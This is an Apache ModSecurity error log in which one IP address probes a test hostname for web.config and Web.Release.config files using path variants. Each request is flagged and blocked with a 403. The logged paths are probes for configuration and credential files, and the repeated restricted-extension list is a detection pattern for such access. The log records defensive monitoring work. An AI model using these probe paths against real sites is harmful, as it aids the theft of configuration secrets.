[Fri Jan 16 03:18:26.480208 2026] [:error] [pid 1444034] [client 45.148.10.246:45138] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config/"] [unique_id "aWmf8uRfEYyDES-ZFL4hyAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/web.config/
[Fri Jan 16 03:18:26.480437 2026] [:error] [pid 1444034] [client 45.148.10.246:45138] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config/"] [unique_id "aWmf8uRfEYyDES-ZFL4hyAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/web.config/
[Fri Jan 16 03:18:26.480642 2026] [:error] [pid 1444034] [client 45.148.10.246:45138] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config/"] [unique_id "aWmf8uRfEYyDES-ZFL4hyAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/web.config/
[Fri Jan 16 03:18:26.641307 2026] [:error] [pid 1444035] [client 45.148.10.246:45142] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aWmf8rauW6yeGWXfDeFXMQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//web.config
[Fri Jan 16 03:18:26.641455 2026] [:error] [pid 1444035] [client 45.148.10.246:45142] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aWmf8rauW6yeGWXfDeFXMQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//web.config
[Fri Jan 16 03:18:26.641674 2026] [:error] [pid 1444035] [client 45.148.10.246:45142] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aWmf8rauW6yeGWXfDeFXMQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//web.config
[Fri Jan 16 03:18:26.641848 2026] [:error] [pid 1444035] [client 45.148.10.246:45142] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aWmf8rauW6yeGWXfDeFXMQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//web.config
[Fri Jan 16 03:18:26.793842 2026] [:error] [pid 1444033] [client 45.148.10.246:45144] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aWmf8tLJkp65ULFQ2YYiNQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./web.config
[Fri Jan 16 03:18:26.794000 2026] [:error] [pid 1444033] [client 45.148.10.246:45144] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aWmf8tLJkp65ULFQ2YYiNQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./web.config
[Fri Jan 16 03:18:26.794221 2026] [:error] [pid 1444033] [client 45.148.10.246:45144] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aWmf8tLJkp65ULFQ2YYiNQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./web.config
[Fri Jan 16 03:18:26.794403 2026] [:error] [pid 1444033] [client 45.148.10.246:45144] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aWmf8tLJkp65ULFQ2YYiNQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./web.config
[Fri Jan 16 03:18:26.995528 2026] [:error] [pid 1444040] [client 45.148.10.246:45152] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config"] [unique_id "aWmf8vn_5sIyKhJ5GAzZmQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/Web.config
[Fri Jan 16 03:18:26.995687 2026] [:error] [pid 1444040] [client 45.148.10.246:45152] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config"] [unique_id "aWmf8vn_5sIyKhJ5GAzZmQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/Web.config
[Fri Jan 16 03:18:26.995909 2026] [:error] [pid 1444040] [client 45.148.10.246:45152] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config"] [unique_id "aWmf8vn_5sIyKhJ5GAzZmQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/Web.config
[Fri Jan 16 03:18:26.996079 2026] [:error] [pid 1444040] [client 45.148.10.246:45152] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config"] [unique_id "aWmf8vn_5sIyKhJ5GAzZmQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/Web.config
[Fri Jan 16 03:18:27.130220 2026] [:error] [pid 1444032] [client 45.148.10.246:45158] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config/"] [unique_id "aWmf8-kMvq8uPO2ZciWpywAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/Web.config/
[Fri Jan 16 03:18:27.130485 2026] [:error] [pid 1444032] [client 45.148.10.246:45158] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config/"] [unique_id "aWmf8-kMvq8uPO2ZciWpywAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/Web.config/
[Fri Jan 16 03:18:27.130653 2026] [:error] [pid 1444032] [client 45.148.10.246:45158] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config/"] [unique_id "aWmf8-kMvq8uPO2ZciWpywAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/Web.config/
[Fri Jan 16 03:18:27.267444 2026] [:error] [pid 1444226] [client 45.148.10.246:45174] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config"] [unique_id "aWmf82cpoCUgeFICb0be0AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//Web.config
[Fri Jan 16 03:18:27.267586 2026] [:error] [pid 1444226] [client 45.148.10.246:45174] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config"] [unique_id "aWmf82cpoCUgeFICb0be0AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//Web.config
[Fri Jan 16 03:18:27.267795 2026] [:error] [pid 1444226] [client 45.148.10.246:45174] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config"] [unique_id "aWmf82cpoCUgeFICb0be0AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//Web.config
[Fri Jan 16 03:18:27.267959 2026] [:error] [pid 1444226] [client 45.148.10.246:45174] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config"] [unique_id "aWmf82cpoCUgeFICb0be0AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//Web.config
[Fri Jan 16 03:18:27.387596 2026] [:error] [pid 1444034] [client 45.148.10.246:45182] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config"] [unique_id "aWmf8-RfEYyDES-ZFL4hyQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./Web.config
[Fri Jan 16 03:18:27.387759 2026] [:error] [pid 1444034] [client 45.148.10.246:45182] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config"] [unique_id "aWmf8-RfEYyDES-ZFL4hyQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./Web.config
[Fri Jan 16 03:18:27.387973 2026] [:error] [pid 1444034] [client 45.148.10.246:45182] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config"] [unique_id "aWmf8-RfEYyDES-ZFL4hyQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./Web.config
[Fri Jan 16 03:18:27.388127 2026] [:error] [pid 1444034] [client 45.148.10.246:45182] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.config"] [unique_id "aWmf8-RfEYyDES-ZFL4hyQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./Web.config
[Fri Jan 16 03:18:27.557466 2026] [:error] [pid 1444035] [client 45.148.10.246:45184] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.Release.config"] [unique_id "aWmf87auW6yeGWXfDeFXMgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/Web.Release.config
[Fri Jan 16 03:18:27.557800 2026] [:error] [pid 1444035] [client 45.148.10.246:45184] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.Release.config"] [unique_id "aWmf87auW6yeGWXfDeFXMgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/Web.Release.config
[Fri Jan 16 03:18:27.557956 2026] [:error] [pid 1444035] [client 45.148.10.246:45184] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.Release.config"] [unique_id "aWmf87auW6yeGWXfDeFXMgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/Web.Release.config
[Fri Jan 16 03:18:27.871978 2026] [:error] [pid 1444040] [client 45.148.10.246:45210] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.Release.config"] [unique_id "aWmf8_n_5sIyKhJ5GAzZmgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//Web.Release.config
[Fri Jan 16 03:18:27.872320 2026] [:error] [pid 1444040] [client 45.148.10.246:45210] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.Release.config"] [unique_id "aWmf8_n_5sIyKhJ5GAzZmgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//Web.Release.config
[Fri Jan 16 03:18:27.872475 2026] [:error] [pid 1444040] [client 45.148.10.246:45210] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.Release.config"] [unique_id "aWmf8_n_5sIyKhJ5GAzZmgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//Web.Release.config
